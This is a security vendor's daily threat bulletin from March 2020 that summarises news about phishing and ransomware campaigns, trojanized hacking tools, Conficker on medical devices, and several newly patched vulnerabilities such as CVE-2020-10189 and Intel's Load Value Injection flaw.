Malware MiTM Phishing Ransomware Snooping Trojan Vulnerability

CloudSEK Daily Threat Bulletin – 10th March 2020

Round Up of Major Breaches and Scams

Years-long campaign targets hackers through trojanized hacking tools

Vietnam based threat group has been hacking other hackers through njRAT infected hacking tools. Instead of directly hacking systems, spreading trojanized hacking tools gives them complete access to a much larger pool of hacked data. These trojanized tools have been around for years, some of which are site scrapers, exploit scanners, SQL injection tools, credential verification tools, and even trojanized versions of the Chrome browser.

Bogus HIV test results are the latest lures used by cybercrooks

Even as COVID-19 related phishing attacks flourish, attackers have started distributing malware in the guise of emails that contain HIV test results. Since there is still a lot of misinformation and fear regarding HIV, victims tend to fall for the trap. A Russian hacking group purportedly sent 200 such phishing emails to employees of a large North American pharmaceutical and insurance companies. This infects the companies’ systems with Koadic RAT, which allows attackers to track keystrokes and execute code on the affected systems.

Round Up of Major Malware and Ransomware Incidents

How poor IoT security is allowing this 12-year-old malware to make a comeback

Poor security of Internet of Things (IoT) devices helps sustain the antiquated malware Conficker. The malware, which was first spotted in 2008, primarily exploits flaws in Windows XP and older versions. The recent resurgence has been attributed to connected medical devices which still run on outdated/ unsupported versions of Windows. Recently, a hospital detected unusual activity in its mammography machine and found that several of their devices had been infected by Conficker. The hospital took their systems offline and installed patches.

Paradise Ransomware distributed via uncommon spam attachment

Attackers have started to send Excel Web Query attachments in phishing campaigns to download and install the Paradise Ransomware on unsuspecting victims. Paradise Ransomware is fairly old with activity going as far back as September 2017 when it was first reported by a victim in the BleepingComputer forums. Since then, there has been a steady trickle of victims from this ransomware as can be seen from the submissions to the ransomware identification site ID-Ransomware.

Round Up of Major Vulnerabilities and Patches

Microsoft Patch Tuesday — March 2020: Vulnerability disclosures and Snort coverage

Microsoft released its monthly security update today, disclosing vulnerabilities across many of its products and releasing corresponding updates. This month’s Patch Tuesday covers 117 vulnerabilities, 25 of which are considered critical. There is also one moderate vulnerability and 91 that are considered important. This month’s patches include updates to Microsoft Media Foundation, the GDI+ API and Windows Defender, among others.

Firefox bug opens iPhone AirPods to third-party Snooping

Version 74 of the Firefox browser addresses 12 vulnerabilities. Among the vulnerabilities were 5 high, 6 medium, and 1 low severity. An interesting medium severity vulnerability allowed websites with cameras or microphones to collect iPhone user data, when connected to AirPods. Another Mozilla foundation releases a new corporate version of its browser Firefox ESR 68.6, as well.

Avast AntiTrack certificate bug allowed others to snoop on your online activities

A certification validation flaw (CVE-2020-8987) in Avast AntiTrack versions before and AVG AntiTrack versions before, leaves PCs vulnerable to Man-in-The-Middle (MiTM) attacks, browser session hijacks, and data theft. Attackers can do this without local access, or any software configuration changes. Users are urged to update to the patched Avast AntiTrack version and AVG AntiTrack version

Hackers exploiting recently patched ManageEngine Desktop Central vulnerability

A recently disclosed vulnerability affecting Zoho’s ManageEngine Desktop Central endpoint management solution is already being exploited in attacks. The flaw, tracked as CVE-2020-10189, was patched by ManageEngine over the weekend with the release of version 10.0.479. Following reports that the vulnerability has been exploited in the wild, the vendor also published an advisory with instructions for identifying a compromised installation.

Load Value Injection: Intel CPUs vulnerable to reverse Meltdown attack

Many processors made by Intel are vulnerable to a newly disclosed type of attack named Load Value Injection (LVI), but the chip maker has told customers that the attack is not very practical in real world environments. The vulnerability, tracked as CVE-2020-0551, was first reported to Intel in April 2019 by Jo Van Bulck from the KU Leuven research university in Belgium and it was analyzed by a team from universities in the United States, Austria and Australia, including some of the researchers who first discovered the Meltdown and Spectre vulnerabilities.

Vulnerability spotlight: Information disclosure in Windows 10 kernel

Cisco Talos recently discovered an information disclosure vulnerability in the Windows 10 kernel. An attacker could exploit this vulnerability by tricking the victim into opening a specially crafted executable, causing an out-of-bounds read, which leads to the disclosure of sensitive information. Microsoft disclosed and patched this bug as part of their monthly security update Tuesday.